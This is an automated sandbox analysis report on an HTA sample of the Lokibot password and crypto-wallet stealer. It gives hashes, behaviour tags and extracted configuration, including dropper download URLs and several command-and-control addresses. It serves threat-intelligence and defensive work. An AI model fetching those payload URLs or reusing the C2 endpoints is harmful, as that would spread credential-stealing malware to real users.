Overview

overview

10

Static

static

1

ec97b59bc0...69.hta

windows7-x64

10

ec97b59bc0...69.hta

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    5476ba599869d81abee08f38f1c1a1d9.bin

  • Size

    3KB

  • Sample

    241117-blq8lsxhjc

  • MD5

    53b6bdd0388df88cf3ac0c8ec70bff3a

  • SHA1

    b474e080e40cb00315d0c4b9f559c38bce8fa897

  • SHA256

    9c647bd2e704f2fb71d330972614c3a9e7cb9766c469c6a1323f9f4734cb8d06

  • SHA512

    da4a5f59f4b6e859db7e88c5309980f06c31c5d58442c84bd5beef215dd91fea9df205154a43d075ecc3803fdf252b73eca56a023c934979fb16de20a4652a69

Score
10/10
lokibotcollectiondefense_evasiondiscoveryexecutionspywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Extracted

Family

lokibot

C2

http://94.156.177.95/simple/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Targets

    • Target

      ec97b59bc0398eb50eb842046e017755dbbc8d6764a6c26db85cd90853760669.hta

    • Size

      178KB

    • MD5

      5476ba599869d81abee08f38f1c1a1d9

    • SHA1

      46748779ec123145fdf90942c9df65d0099c9a99

    • SHA256

      ec97b59bc0398eb50eb842046e017755dbbc8d6764a6c26db85cd90853760669

    • SHA512

      516531534bee5995295659464f480c6d12909668fdb623c0c02dd93c9055df7bb203833e4e84416b31ef923dff8057f76f0e850bb84c53096cac43cdf2d04edd

    • SSDEEP

      96:4vCl172Xu01IhxXYcQu01IhPXYZxd7b2+sMdHeu01IhLu01Ih5XY4u01Iht5Q:4vCldarG1QrGsx92+KrGLrGZrGLQ

    Score
    10/10
    defense_evasiondiscoveryexecutionlokibotcollectionspywarestealertrojan

    • Lokibot

      Lokibot is a Password and CryptoCoin Wallet Stealer.

      trojanspywarestealerlokibot

    • Lokibot family

      lokibot

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

      execution

    • Evasion via Device Credential Deployment

      defense_evasionexecution

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Accesses Microsoft Outlook profiles

      collection

    • Suspicious use of SetThreadContext

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks